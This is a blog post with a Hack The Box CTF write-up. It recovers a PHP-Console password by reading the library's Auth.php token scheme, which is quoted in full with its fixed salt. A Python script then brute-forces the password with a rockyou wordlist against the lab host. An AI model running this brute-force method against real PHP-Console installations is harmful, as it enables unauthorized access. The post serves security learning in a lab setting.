<!DOCTYPE html>
<html lang="en" prefix="og: https://ogp.me/ns#">
<head>
<meta charset="UTF-8" />
<meta http-equiv="X-UA-Compatible"
      content="IE=edge">
<meta name="viewport"
      content="width=device-width, initial-scale=1.0" />
<meta name="description"
      content="Adventures of Functional Mediocrity" />
<meta name="keywords"
      content="zola, theme, ink, hugo-ink, john tuyen, jtuyen" /> 

<title>John Tuyen | Console</title>
<meta
  property="og:title"
  content="John Tuyen | Console"
/>
<meta property="og:type" content="website" />
<meta property="og:url" content="https://johntuyen.com/posts/htb-console/" />
<meta property="og:description" content="Adventures of Functional Mediocrity" />
<meta property="og:image" content="" />
<meta property="og:image:url" content="" />
<meta property="og:image:secure_url" content="" />
<meta name="twitter:card" content="summary_large_image" />
<meta name="twitter:title" content="Console" />
<meta name="twitter:description" content="Adventures of Functional Mediocrity" />
<meta property="twitter:image" content="" />

<link rel="alternate"
          type="application/rss+xml"
          title="John Tuyen"
          href="https://johntuyen.com/atom.xml">
    <link rel="preconnect"
          href="https://fonts.googleapis.com">
    <link rel="preconnect"
          href="https://fonts.gstatic.com"
          crossorigin>
    <!-- <link href="https://fonts.googleapis.com/css2?family=Inter:wght@400;700&family=Playfair+Display:wght@700&display=swap" rel="stylesheet">  -->
    <link href="https://fonts.googleapis.com/css2?family=Andada+Pro&display=swap&family=Playfair+Display"
          rel="stylesheet">
    <link rel="stylesheet"
          href="https://johntuyen.com/base.css">
    <script src="https://cdnjs.cloudflare.com/ajax/libs/feather-icons/4.28.0/feather.min.js"
            integrity="sha512-7x3zila4t2qNycrtZ31HO0NnJr8kg2VI67YLoRSyi9hGhRN66FHYWr7Axa9Y1J9tGYHVBPqIjSE1ogHrJTz51g=="
            crossorigin="anonymous"></script>
</head>

<body>
    <header>
        <a class="site-name"
           href="/">
            <h1>John Tuyen</h1>
        </a>
        <div class="site-description">
            <p>Adventures of Functional Mediocrity</p>
        </div>
        <nav>
            <div class="links"> 
            <a 
                href="https://johntuyen.com/ ">About</a> 
            <a 
                href="https://johntuyen.com/posts/ ">Posts</a> 
            <a 
                href="https://johntuyen.com/gaze/ ">Gaze</a> 
            <a 
                href="https://johntuyen.com/wiretap/ ">Wiretap</a> 
            <a 
                href="https://johntuyen.com/tags/ ">Tags</a> 
            <a 
                href="https://johntuyen.com/search/ ">Search</a> 
            </div>
        </nav>
    </header>
    <article>
    

<section class="post">
  <div class="post-header">
    <div class="meta">
      <div class="date">
        <span class="day">18</span>
        <span class="rest">Jun 20</span>
      </div>
    </div>

    <div class="matter">
      <h1 class="title">Console </h1>
    </div>
  </div>
    
  <article><ol>
<li>
<p>&quot;Could you please check the console of your Chrome?&quot;</p>
<p>Upon investigating the URL, it showed a php info status page which hinted to load php-console in order to be prompted for a password. At first I didn't know what this meant until I read the hints about downloading a chrome extension.</p>
<p><img src="https://johntuyen.com/posts/htb-console/htb-console-1.png" alt="htb-console-1.png" /></p>
<p><img src="https://johntuyen.com/posts/htb-console/htb-console-2.png" alt="htb-console-2.png" /></p>
<p>Prior before knowing about the Chrome extension, I intercepted some HTTP requests to see what it looks like.</p>
<p><img src="https://johntuyen.com/posts/htb-console/htb-console-3.png" alt="htb-console-3.png" /></p>
<p>As you can see, nothing really interesting is found. Now if you used the PHP-Console extension, you see extra HTTP headers added to the HTTP request.</p>
<p><img src="https://johntuyen.com/posts/htb-console/htb-console-4.png" alt="htb-console-4.png" /></p>
<p>I noticed how the <code>php-console-client</code> cookie parameter was base64 encoded so I decoded it.</p>
<p><img src="https://johntuyen.com/posts/htb-console/htb-console-5.png" alt="htb-console-5.png" /></p>
<p>There we go, a token parameter is found. It's starting to make some sense now of what I need to do. I thought about two questions, first is how can I generate a token? I know that the Chrome extension accepts a password for login but how would I streamline the process to brute force with a dictionary? The second question is, how is a token created? What data type is it using? Is it encrypted? The only way answer these questions is looking at the source code.</p>
</li>
<li>
<p>Looking at the source code of PHP-Console application, there is an interesting <code>auth.php</code> file that handles <a href="https://github.com/barbushin/php-console/blob/master/src/PhpConsole/Auth.php">token generation</a>.</p>
<pre data-lang="php" style="background-color:#2b303b;color:#c0c5ce;" class="language-php "><code class="language-php" data-lang="php"><span style="color:#ab7967;">&lt;?php
</span><span>
</span><span style="color:#b48ead;">namespace </span><span>PhpConsole;
</span><span>
</span><span style="color:#65737e;">/**
</span><span style="color:#65737e;">* PHP Console client authorization credentials &amp; validation class
</span><span style="color:#65737e;">*
</span><span style="color:#65737e;">* </span><span style="color:#b48ead;">@package</span><span style="color:#65737e;"> PhpConsole
</span><span style="color:#65737e;">* </span><span style="color:#b48ead;">@version</span><span style="color:#65737e;"> 3.1
</span><span style="color:#65737e;">* </span><span style="color:#b48ead;">@link </span><span style="color:#65737e;">http://consle.com
</span><span style="color:#65737e;">* </span><span style="color:#b48ead;">@author</span><span style="color:#65737e;"> Sergey Barbushin http://linkedin.com/in/barbushin
</span><span style="color:#65737e;">* </span><span style="color:#b48ead;">@copyright</span><span style="color:#65737e;"> © Sergey Barbushin, 2011-2013. All rights reserved.
</span><span style="color:#65737e;">* </span><span style="color:#b48ead;">@license </span><span style="color:#65737e;">http://www.opensource.org/licenses/BSD-3-Clause &quot;The BSD 3-Clause License&quot;
</span><span style="color:#65737e;">* </span><span style="color:#b48ead;">@codeCoverageIgnore
</span><span style="color:#65737e;">*/
</span><span style="color:#b48ead;">class </span><span style="color:#ebcb8b;">Auth </span><span style="color:#eff1f5;">{
</span><span style="color:#eff1f5;">
</span><span style="color:#b48ead;">const </span><span style="color:#d08770;">PASSWORD_HASH_SALT </span><span>= &#39;</span><span style="color:#a3be8c;">NeverChangeIt:)</span><span>&#39;</span><span style="color:#eff1f5;">;
</span><span style="color:#eff1f5;">
</span><span style="color:#b48ead;">protected </span><span>$</span><span style="color:#bf616a;">publicKeyByIp</span><span style="color:#eff1f5;">;
</span><span style="color:#b48ead;">protected </span><span>$</span><span style="color:#bf616a;">passwordHash</span><span style="color:#eff1f5;">;
</span><span style="color:#eff1f5;">
</span><span style="color:#65737e;">/**
</span><span style="color:#65737e;"> * </span><span style="color:#b48ead;">@param</span><span style="color:#65737e;"> string $password Common password for all clients
</span><span style="color:#65737e;"> * </span><span style="color:#b48ead;">@param</span><span style="color:#65737e;"> bool $publicKeyByIp Set public key depending on client IP
</span><span style="color:#65737e;"> */
</span><span style="color:#b48ead;">public function </span><span style="color:#96b5b4;">__construct</span><span style="color:#eff1f5;">(</span><span>$</span><span style="color:#bf616a;">password</span><span style="color:#eff1f5;">, </span><span>$</span><span style="color:#bf616a;">publicKeyByIp </span><span>= </span><span style="color:#d08770;">true</span><span style="color:#eff1f5;">) {
</span><span style="color:#eff1f5;">	</span><span>$</span><span style="color:#bf616a;">this</span><span style="color:#eff1f5;">-&gt;</span><span style="color:#bf616a;">publicKeyByIp </span><span>= $</span><span style="color:#bf616a;">publicKeyByIp</span><span style="color:#eff1f5;">;
</span><span style="color:#eff1f5;">	</span><span>$</span><span style="color:#bf616a;">this</span><span style="color:#eff1f5;">-&gt;</span><span style="color:#bf616a;">passwordHash </span><span>= $</span><span style="color:#bf616a;">this</span><span style="color:#eff1f5;">-&gt;</span><span style="color:#bf616a;">getPasswordHash</span><span style="color:#eff1f5;">(</span><span>$</span><span style="color:#bf616a;">password</span><span style="color:#eff1f5;">);
</span><span style="color:#eff1f5;">}
</span><span style="color:#eff1f5;">
</span><span style="color:#b48ead;">protected </span><span style="color:#ebcb8b;">final </span><span style="color:#b48ead;">function </span><span style="color:#8fa1b3;">hash</span><span style="color:#eff1f5;">(</span><span>$</span><span style="color:#bf616a;">string</span><span style="color:#eff1f5;">) {
</span><span style="color:#eff1f5;">	</span><span style="color:#b48ead;">return </span><span style="color:#96b5b4;">hash</span><span style="color:#eff1f5;">(</span><span>&#39;</span><span style="color:#a3be8c;">sha256</span><span>&#39;</span><span style="color:#eff1f5;">, </span><span>$</span><span style="color:#bf616a;">string</span><span style="color:#eff1f5;">);
</span><span style="color:#eff1f5;">}
</span><span style="color:#eff1f5;">
</span><span style="color:#65737e;">/**
</span><span style="color:#65737e;"> * Get password hash like on client
</span><span style="color:#65737e;"> * </span><span style="color:#b48ead;">@param</span><span style="color:#65737e;"> $password
</span><span style="color:#65737e;"> * </span><span style="color:#b48ead;">@return</span><span style="color:#65737e;"> string
</span><span style="color:#65737e;"> */
</span><span style="color:#b48ead;">protected </span><span style="color:#ebcb8b;">final </span><span style="color:#b48ead;">function </span><span style="color:#8fa1b3;">getPasswordHash</span><span style="color:#eff1f5;">(</span><span>$</span><span style="color:#bf616a;">password</span><span style="color:#eff1f5;">) {
</span><span style="color:#eff1f5;">	</span><span style="color:#b48ead;">return </span><span>$</span><span style="color:#bf616a;">this</span><span style="color:#eff1f5;">-&gt;</span><span style="color:#bf616a;">hash</span><span style="color:#eff1f5;">(</span><span>$</span><span style="color:#bf616a;">password </span><span>. </span><span style="color:#bf616a;">self</span><span style="color:#eff1f5;">::</span><span style="color:#d08770;">PASSWORD_HASH_SALT</span><span style="color:#eff1f5;">);
</span><span style="color:#eff1f5;">}
</span><span style="color:#eff1f5;">
</span><span style="color:#65737e;">/**
</span><span style="color:#65737e;"> * Get authorization result data for client
</span><span style="color:#65737e;"> * </span><span style="color:#b48ead;">@codeCoverageIgnore
</span><span style="color:#65737e;"> * </span><span style="color:#b48ead;">@param</span><span style="color:#65737e;"> ClientAuth|null $clientAuth
</span><span style="color:#65737e;"> * </span><span style="color:#b48ead;">@return</span><span style="color:#65737e;"> ServerAuthStatus
</span><span style="color:#65737e;"> */
</span><span style="color:#b48ead;">public </span><span style="color:#ebcb8b;">final </span><span style="color:#b48ead;">function </span><span style="color:#8fa1b3;">getServerAuthStatus</span><span style="color:#eff1f5;">(</span><span style="color:#ebcb8b;">ClientAuth </span><span>$</span><span style="color:#bf616a;">clientAuth </span><span>= </span><span style="color:#d08770;">null</span><span style="color:#eff1f5;">) {
</span><span style="color:#eff1f5;">	</span><span>$</span><span style="color:#bf616a;">serverAuthStatus </span><span>= </span><span style="color:#b48ead;">new </span><span style="color:#ebcb8b;">ServerAuthStatus</span><span style="color:#eff1f5;">();
</span><span style="color:#eff1f5;">	</span><span>$</span><span style="color:#bf616a;">serverAuthStatus</span><span style="color:#eff1f5;">-&gt;</span><span style="color:#bf616a;">publicKey </span><span>= $</span><span style="color:#bf616a;">this</span><span style="color:#eff1f5;">-&gt;</span><span style="color:#bf616a;">getPublicKey</span><span style="color:#eff1f5;">();
</span><span style="color:#eff1f5;">	</span><span>$</span><span style="color:#bf616a;">serverAuthStatus</span><span style="color:#eff1f5;">-&gt;</span><span style="color:#bf616a;">isSuccess </span><span>= $</span><span style="color:#bf616a;">clientAuth </span><span>&amp;&amp; $</span><span style="color:#bf616a;">this</span><span style="color:#eff1f5;">-&gt;</span><span style="color:#bf616a;">isValidAuth</span><span style="color:#eff1f5;">(</span><span>$</span><span style="color:#bf616a;">clientAuth</span><span style="color:#eff1f5;">);
</span><span style="color:#eff1f5;">	</span><span style="color:#b48ead;">return </span><span>$</span><span style="color:#bf616a;">serverAuthStatus</span><span style="color:#eff1f5;">;
</span><span style="color:#eff1f5;">}
</span><span style="color:#eff1f5;">
</span><span style="color:#65737e;">/**
</span><span style="color:#65737e;"> * Check if client authorization data is valid
</span><span style="color:#65737e;"> * </span><span style="color:#b48ead;">@codeCoverageIgnore
</span><span style="color:#65737e;"> * </span><span style="color:#b48ead;">@param</span><span style="color:#65737e;"> ClientAuth $clientAuth
</span><span style="color:#65737e;"> * </span><span style="color:#b48ead;">@return</span><span style="color:#65737e;"> bool
</span><span style="color:#65737e;"> */
</span><span style="color:#b48ead;">public </span><span style="color:#ebcb8b;">final </span><span style="color:#b48ead;">function </span><span style="color:#8fa1b3;">isValidAuth</span><span style="color:#eff1f5;">(</span><span style="color:#ebcb8b;">ClientAuth </span><span>$</span><span style="color:#bf616a;">clientAuth</span><span style="color:#eff1f5;">) {
</span><span style="color:#eff1f5;">	</span><span style="color:#b48ead;">return </span><span>$</span><span style="color:#bf616a;">clientAuth</span><span style="color:#eff1f5;">-&gt;</span><span style="color:#bf616a;">publicKey </span><span>=== $</span><span style="color:#bf616a;">this</span><span style="color:#eff1f5;">-&gt;</span><span style="color:#bf616a;">getPublicKey</span><span style="color:#eff1f5;">() </span><span>&amp;&amp; $</span><span style="color:#bf616a;">clientAuth</span><span style="color:#eff1f5;">-&gt;</span><span style="color:#bf616a;">token </span><span>=== $</span><span style="color:#bf616a;">this</span><span style="color:#eff1f5;">-&gt;</span><span style="color:#bf616a;">getToken</span><span style="color:#eff1f5;">();
</span><span style="color:#eff1f5;">}
</span><span style="color:#eff1f5;">
</span><span style="color:#65737e;">/**
</span><span style="color:#65737e;"> * Get client unique identification
</span><span style="color:#65737e;"> * </span><span style="color:#b48ead;">@return</span><span style="color:#65737e;"> string
</span><span style="color:#65737e;"> */
</span><span style="color:#b48ead;">protected function </span><span style="color:#8fa1b3;">getClientUid</span><span style="color:#eff1f5;">() {
</span><span style="color:#eff1f5;">	</span><span>$</span><span style="color:#bf616a;">clientUid </span><span>= &#39;&#39;</span><span style="color:#eff1f5;">;
</span><span style="color:#eff1f5;">	</span><span style="color:#b48ead;">if</span><span style="color:#eff1f5;">(</span><span>$</span><span style="color:#bf616a;">this</span><span style="color:#eff1f5;">-&gt;</span><span style="color:#bf616a;">publicKeyByIp</span><span style="color:#eff1f5;">) {
</span><span style="color:#eff1f5;">		</span><span style="color:#b48ead;">if</span><span style="color:#eff1f5;">(</span><span style="color:#96b5b4;">isset</span><span style="color:#eff1f5;">(</span><span>$</span><span style="color:#bf616a;">_SERVER</span><span style="color:#eff1f5;">[</span><span>&#39;</span><span style="color:#a3be8c;">REMOTE_ADDR</span><span>&#39;</span><span style="color:#eff1f5;">])) {
</span><span style="color:#eff1f5;">			</span><span>$</span><span style="color:#bf616a;">clientUid </span><span>.= $</span><span style="color:#bf616a;">_SERVER</span><span style="color:#eff1f5;">[</span><span>&#39;</span><span style="color:#a3be8c;">REMOTE_ADDR</span><span>&#39;</span><span style="color:#eff1f5;">];
</span><span style="color:#eff1f5;">		}
</span><span style="color:#eff1f5;">		</span><span style="color:#b48ead;">if</span><span style="color:#eff1f5;">(</span><span style="color:#96b5b4;">isset</span><span style="color:#eff1f5;">(</span><span>$</span><span style="color:#bf616a;">_SERVER</span><span style="color:#eff1f5;">[</span><span>&#39;</span><span style="color:#a3be8c;">HTTP_X_FORWARDED_FOR</span><span>&#39;</span><span style="color:#eff1f5;">])) {
</span><span style="color:#eff1f5;">			</span><span>$</span><span style="color:#bf616a;">clientUid </span><span>.= $</span><span style="color:#bf616a;">_SERVER</span><span style="color:#eff1f5;">[</span><span>&#39;</span><span style="color:#a3be8c;">HTTP_X_FORWARDED_FOR</span><span>&#39;</span><span style="color:#eff1f5;">];
</span><span style="color:#eff1f5;">		}
</span><span style="color:#eff1f5;">	}
</span><span style="color:#eff1f5;">	</span><span style="color:#b48ead;">return </span><span>$</span><span style="color:#bf616a;">clientUid</span><span style="color:#eff1f5;">;
</span><span style="color:#eff1f5;">}
</span><span style="color:#eff1f5;">
</span><span style="color:#65737e;">/**
</span><span style="color:#65737e;"> * Get authorization session public key for current client
</span><span style="color:#65737e;"> * </span><span style="color:#b48ead;">@return</span><span style="color:#65737e;"> string
</span><span style="color:#65737e;"> */
</span><span style="color:#b48ead;">protected function </span><span style="color:#8fa1b3;">getPublicKey</span><span style="color:#eff1f5;">() {
</span><span style="color:#eff1f5;">	</span><span style="color:#b48ead;">return </span><span>$</span><span style="color:#bf616a;">this</span><span style="color:#eff1f5;">-&gt;</span><span style="color:#bf616a;">hash</span><span style="color:#eff1f5;">(</span><span>$</span><span style="color:#bf616a;">this</span><span style="color:#eff1f5;">-&gt;</span><span style="color:#bf616a;">getClientUid</span><span style="color:#eff1f5;">() </span><span>. $</span><span style="color:#bf616a;">this</span><span style="color:#eff1f5;">-&gt;</span><span style="color:#bf616a;">passwordHash</span><span style="color:#eff1f5;">);
</span><span style="color:#eff1f5;">}
</span><span style="color:#eff1f5;">
</span><span style="color:#65737e;">/**
</span><span style="color:#65737e;"> * Get string signature for current password &amp; public key
</span><span style="color:#65737e;"> * </span><span style="color:#b48ead;">@param</span><span style="color:#65737e;"> $string
</span><span style="color:#65737e;"> * </span><span style="color:#b48ead;">@return</span><span style="color:#65737e;"> string
</span><span style="color:#65737e;"> */
</span><span style="color:#b48ead;">public </span><span style="color:#ebcb8b;">final </span><span style="color:#b48ead;">function </span><span style="color:#8fa1b3;">getSignature</span><span style="color:#eff1f5;">(</span><span>$</span><span style="color:#bf616a;">string</span><span style="color:#eff1f5;">) {
</span><span style="color:#eff1f5;">	</span><span style="color:#b48ead;">return </span><span>$</span><span style="color:#bf616a;">this</span><span style="color:#eff1f5;">-&gt;</span><span style="color:#bf616a;">hash</span><span style="color:#eff1f5;">(</span><span>$</span><span style="color:#bf616a;">this</span><span style="color:#eff1f5;">-&gt;</span><span style="color:#bf616a;">passwordHash </span><span>. $</span><span style="color:#bf616a;">this</span><span style="color:#eff1f5;">-&gt;</span><span style="color:#bf616a;">getPublicKey</span><span style="color:#eff1f5;">() </span><span>. $</span><span style="color:#bf616a;">string</span><span style="color:#eff1f5;">);
</span><span style="color:#eff1f5;">}
</span><span style="color:#eff1f5;">
</span><span style="color:#65737e;">/**
</span><span style="color:#65737e;"> * Get expected valid client authorization token
</span><span style="color:#65737e;"> * </span><span style="color:#b48ead;">@return</span><span style="color:#65737e;"> string
</span><span style="color:#65737e;"> */
</span><span style="color:#b48ead;">private </span><span style="color:#ebcb8b;">final </span><span style="color:#b48ead;">function </span><span style="color:#8fa1b3;">getToken</span><span style="color:#eff1f5;">() {
</span><span style="color:#eff1f5;">	</span><span style="color:#b48ead;">return </span><span>$</span><span style="color:#bf616a;">this</span><span style="color:#eff1f5;">-&gt;</span><span style="color:#bf616a;">hash</span><span style="color:#eff1f5;">(</span><span>$</span><span style="color:#bf616a;">this</span><span style="color:#eff1f5;">-&gt;</span><span style="color:#bf616a;">passwordHash </span><span>. $</span><span style="color:#bf616a;">this</span><span style="color:#eff1f5;">-&gt;</span><span style="color:#bf616a;">getPublicKey</span><span style="color:#eff1f5;">());
</span><span style="color:#eff1f5;">}
</span><span style="color:#eff1f5;">}
</span></code></pre>
<p>After reviewing the code, I figured out the token is salted and using sha256 to generate the token. It was a matter of creating a brute forcing python script to figure out what is the actual password to log into PHP-Console Chrome extension.</p>
<pre data-lang="python" style="background-color:#2b303b;color:#c0c5ce;" class="language-python "><code class="language-python" data-lang="python"><span style="color:#b48ead;">import </span><span>requests
</span><span style="color:#b48ead;">from </span><span>hashlib </span><span style="color:#b48ead;">import </span><span>sha256
</span><span style="color:#b48ead;">from </span><span>base64 </span><span style="color:#b48ead;">import </span><span>b64encode
</span><span style="color:#b48ead;">import </span><span>json
</span><span>
</span><span>url = &quot;</span><span style="color:#a3be8c;">http://docker.hackthebox.eu:31828</span><span>&quot;
</span><span>
</span><span style="color:#65737e;"># publickey found in the PHP-Console HTTP header
</span><span>publickey = &quot;</span><span style="color:#a3be8c;">d1d58b2f732fd546d9507da275a71bddc0c2300a214af3f3f3a5f5f249fe275e</span><span>&quot;
</span><span>
</span><span style="color:#65737e;"># Open rockyou.txt file in read mode
</span><span>file = </span><span style="color:#96b5b4;">open</span><span>(&quot;</span><span style="color:#a3be8c;">./rockyou.txt</span><span>&quot;,&quot;</span><span style="color:#a3be8c;">r</span><span>&quot;)
</span><span>
</span><span style="color:#65737e;"># Create for loop to iterate through each entry in rockyou.txt
</span><span style="color:#b48ead;">for </span><span>x </span><span style="color:#b48ead;">in </span><span style="color:#96b5b4;">range</span><span>(</span><span style="color:#d08770;">1000</span><span>):
</span><span>   word = file.</span><span style="color:#bf616a;">readline</span><span>().</span><span style="color:#bf616a;">strip</span><span>()
</span><span>
</span><span>   </span><span style="color:#65737e;"># For every line in rockyou.txt, append the salt to prepare to later create the hash
</span><span>   password = word + &quot;</span><span style="color:#a3be8c;">NeverChangeIt:)</span><span>&quot;
</span><span>
</span><span>   </span><span style="color:#65737e;"># return hash(&#39;sha256&#39;, $string);
</span><span>   </span><span style="color:#65737e;"># In the auth.php, it uses sha256 to create the hash using the string + salt.
</span><span>   </span><span style="color:#96b5b4;">hash </span><span>= </span><span style="color:#bf616a;">sha256</span><span>(password.</span><span style="color:#bf616a;">encode</span><span>()).</span><span style="color:#bf616a;">hexdigest</span><span>()
</span><span>
</span><span>   </span><span style="color:#65737e;"># return $this-&gt;hash($this-&gt;passwordHash . $this-&gt;getPublicKey());
</span><span>   </span><span style="color:#65737e;"># Also it uses the sha256 salted hash with the publickey to generate another sha256 hash for the token.
</span><span>   token = </span><span style="color:#bf616a;">sha256</span><span>((</span><span style="color:#96b5b4;">hash </span><span>+ publickey).</span><span style="color:#bf616a;">encode</span><span>()).</span><span style="color:#bf616a;">hexdigest</span><span>()
</span><span>
</span><span>   </span><span style="color:#65737e;"># Now start putting together the HTTP GET request starting with the HTTP header paramters
</span><span>   phpconsoleclient = &#39;</span><span style="color:#a3be8c;">{&quot;php-console-client&quot;:5,&quot;auth&quot;:{&quot;publicKey&quot;:&quot;d1d58b2f732fd546d9507da275a71bddc0c2300a214af3f3f3a5f5f249fe275e&quot;,&quot;token&quot;:&quot;</span><span>&#39; + </span><span style="color:#bf616a;">str</span><span>(token) + &#39;</span><span style="color:#a3be8c;">&quot;</span><span style="color:#96b5b4;">}}</span><span>&#39;
</span><span>
</span><span>   </span><span style="color:#65737e;"># The original GET request has encoded php-console-client into base64, this step is doing the same thing. The decode function changes the object type
</span><span>   </span><span style="color:#65737e;"># from bytes to string.
</span><span>   phpconsoleclient = </span><span style="color:#bf616a;">b64encode</span><span>(phpconsoleclient.</span><span style="color:#bf616a;">encode</span><span>()).</span><span style="color:#bf616a;">decode</span><span>()
</span><span>
</span><span>   </span><span style="color:#65737e;"># Add all the cookies required in the original GET request.
</span><span>   cookies = &#39;</span><span style="color:#a3be8c;">php-console-server=5; php-console-client=</span><span>&#39; + </span><span style="color:#bf616a;">str</span><span>(phpconsoleclient)
</span><span>
</span><span>   </span><span style="color:#65737e;"># Create a python dictionary object to store the header parameters
</span><span>   headers = { &#39;</span><span style="color:#a3be8c;">Cookie</span><span>&#39; : cookies }
</span><span>
</span><span>   </span><span style="color:#65737e;"># Create HTTP GET request with url and HTTP headers
</span><span>   r = requests.</span><span style="color:#bf616a;">get</span><span>(url, </span><span style="color:#bf616a;">headers</span><span>=headers)
</span><span>
</span><span>   </span><span style="color:#65737e;"># Append php-console to the GET request HTTP header
</span><span>   phpconsoleclient = r.headers[&#39;</span><span style="color:#a3be8c;">PHP-Console</span><span>&#39;]
</span><span>   phpconsoleclient = json.</span><span style="color:#bf616a;">loads</span><span>(phpconsoleclient)
</span><span>
</span><span>   </span><span style="color:#65737e;"># Print the word in the current interation when isSuccess equals to True. This is the word that will allow access to PHP-Console chrome plugin.
</span><span>   status = phpconsoleclient[&quot;</span><span style="color:#a3be8c;">auth</span><span>&quot;][&quot;</span><span style="color:#a3be8c;">isSuccess</span><span>&quot;]
</span><span>   </span><span style="color:#b48ead;">if</span><span>(status != </span><span style="color:#d08770;">False</span><span>):
</span><span>       </span><span style="color:#96b5b4;">print</span><span>(word)
</span><span>       </span><span style="color:#b48ead;">break
</span><span>
</span><span style="color:#65737e;"># close rockyou.txt
</span><span>file.</span><span style="color:#bf616a;">close</span><span>()
</span></code></pre>
<p>Running the python script will uncover the password and upon PHP-Console login, the flag can be found in the Chrome console.</p>
<p><img src="https://johntuyen.com/posts/htb-console/htb-console-6.png" alt="htb-console-6.png" /></p>
<p><img src="https://johntuyen.com/posts/htb-console/htb-console-7.png" alt="htb-console-7.png" /></p>
<p><img src="https://johntuyen.com/posts/htb-console/htb-console-8.png" alt="htb-console-8.png" /></p>
</li>
</ol>
</article>

  
    
  
  <ul class="tags">
    
      <li><a href='https://johntuyen.com/tags/hackthebox'>hackthebox</a></li>
    
  </ul>
  
  
    
</section>
</article>
    <footer>
        <div class="social">
            <ul> 
                 
                <li>
                    <a href="https://github.com/jtuyen"
                       title="Github" rel="me"><i data-feather="github"></i></a>
                </li>
                 
                 
                <li>
                    <a href="https://twitter.com/jtuyen"
                       title="Twitter"
                       rel="me"><i data-feather="twitter"></i></a>
                </li>
                
                
                
                <li>
                    <a href="https://johntuyen.com/johntuyenprotonmailcom-pgp.asc" title="PGP" rel="me">
                        <i data-feather="lock"></i>
                    </a>
                </li>
                
                <li>
                    <a href="https://johntuyen.com/atom.xml"
                       title="John Tuyen"><i data-feather="rss"></i></a>
                </li>
            </ul>
        </div>
        <p> © John Tuyen 2024

        
        
        </p>
    </footer>
    <script>
        feather.replace();
    </script> 
    </body>
</html>